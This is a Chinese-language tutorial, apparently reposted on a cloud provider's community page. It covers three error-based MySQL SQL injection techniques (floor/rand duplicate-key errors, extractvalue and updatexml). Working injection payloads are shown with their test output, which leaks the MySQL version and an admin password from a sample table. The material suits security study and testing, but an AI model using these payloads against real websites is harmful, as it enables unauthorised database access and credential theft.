關於Mysql注入過程中的三種報錯方式)

來源:互聯網
上載者:User

放點原來的筆記,Mysql在執行語句的時候會拋出異常資訊資訊,而php+mysql架構的網站往往又將錯誤碼顯示在頁面上,這樣可以通過構造如下三種方法擷取特定資料。

實際測試環境:

?
1234567 mysql> show tables;+----------------+| Tables_in_test |+----------------+| admin          || article        |+----------------+

 

?
12345678 mysql> describe admin;+-------+------------------+------+-----+---------+----------------+| Field | Type             | Null | Key | Default | Extra          |+-------+------------------+------+-----+---------+----------------+| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment || user  | varchar(50)      | NO   |     | NULL    |                || pass  | varchar(50)      | NO   |     | NULL    |                |+-------+------------------+------+-----+---------+----------------+

 

?
12345678 mysql> describe article;+---------+------------------+------+-----+---------+----------------+| Field   | Type             | Null | Key | Default | Extra          |+---------+------------------+------+-----+---------+----------------+| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment || title   | varchar(50)      | NO   |     | NULL    |                || content | varchar(50)      | NO   |     | NULL    |                |+---------+------------------+------+-----+---------+----------------+

1、通過floor報錯

可以通過如下一些利用代碼

?
12 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))xfrom information_schema.tables group by x)a);
?
123 and (select count(*) from (select 1 union select null union select !1)xgroup by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

舉例如下: 首先進行正常查詢:

?
123456 mysql> select * from article where id = 1;+----+-------+---------+| id | title | content |+----+-------+---------+|  1 | test  | do it   |+----+-------+---------+

假如id輸入存在注入的話,可以通過如下語句進行報錯。

?
123 mysql> select * from article where id = 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

可以看到成功爆出了Mysql的版本,如果需要查詢其他資料,可以通過修改version()所在位置語句進行查詢。 例如我們需要查詢管理使用者名和密碼: Method1:

?
1234 mysql> select * from article where id = 1 and (select 1 from(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))xfrom information_schema.tables group by x)a);ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

?
1234 mysql> select * from article where id = 1 and (select count(*)from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2、ExtractValue 測試語句如下

?
1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

實際測試過程

?
123 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml 測試語句

?
1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

實際測試過程

?
123 mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

All, thanks foreign guys.

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.